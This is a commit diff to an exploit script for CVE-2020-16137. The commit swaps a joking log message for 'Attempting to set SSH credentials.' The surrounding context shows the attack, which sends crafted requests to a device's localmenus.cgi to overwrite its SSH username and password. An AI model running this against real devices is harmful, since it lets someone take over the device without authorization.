Update CVE-2020-16137.py
Removed jest and included more useful information.
This commit is contained in:
@@ -61,7 +61,7 @@ def run(args):
|
||||
url = "http://{}/localmenus.cgi".format(args['rhost'])
|
||||
payload_user = {"func": "403", "set": "401", "name1": args['USER'], "name2": args['USER']}
|
||||
payload_pass = {"func": "403", "set": "402", "pwd1": args['PASS'], "pwd2": args['PASS']}
|
||||
logging.info("FIRING ZE MIZZLES!")
|
||||
logging.info("Attempting to set SSH credentials.")
|
||||
try:
|
||||
r = requests.post(url=url, params=payload_user, timeout=int(args['TIMEOUT']))
|
||||
if r.status_code != 200:
|
||||
|
||||
Reference in New Issue
Block a user